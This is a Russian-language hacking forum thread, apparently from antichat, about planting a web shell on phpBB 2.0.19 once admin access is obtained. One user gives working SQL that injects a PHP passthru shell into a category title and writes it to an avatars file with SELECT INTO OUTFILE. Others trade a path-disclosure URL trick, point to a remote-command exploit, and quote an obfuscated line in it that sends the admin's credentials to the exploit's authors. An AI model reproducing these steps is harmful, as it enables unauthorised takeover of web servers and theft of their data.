Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа.
Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admin_disa...p?setmodules=00, но отображается пустая страница.....

А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html

кинь сцылку в пм, посмотрим что к чему

А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
Пробовал, но команды не выполняются, не знаю почему...

Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
потом заменял на
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам! :cool:

Dr.Check
Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
home/test2.ru/www/phpbb
А как ты собираешся его узнать на чужом серваке?

А ты сплойт подправил? Там ids маячок стоит....

А ты сплойт подправил? Там ids маячок стоит....
А разве это как-то сказывается на его работе?
На локалхосте работал, а чтоб поправить не хватает заний перла... жаль

А разве это как-то сказывается на его работе?
Кроме того что пароль и логин админа домой уходят никак ))))

/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......

Кроме того что пароль и логин админа домой уходят никак ))))
Всмысле домой - к рст?
Как почистить сплоит? Помогите
Могу просто удалить строчку
$xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?='.$ids);
Но будет ли он работать, а то тут что-то зашифровали ;)
/admin/admin_disallow.php?setmodules=1 вот этот путь вставь......
Работает в младших версиях, у меня открывает пустую страницу

Вот так пробовал?
http://someserver.com/phpBB///admin/admin_disallow.php?setmodules=1 ?
или с одним слешем?

Комманды с радостью выполняются вот таким способом http://packetstormsecurity.org/0604-advisories/phpbb-admin.txt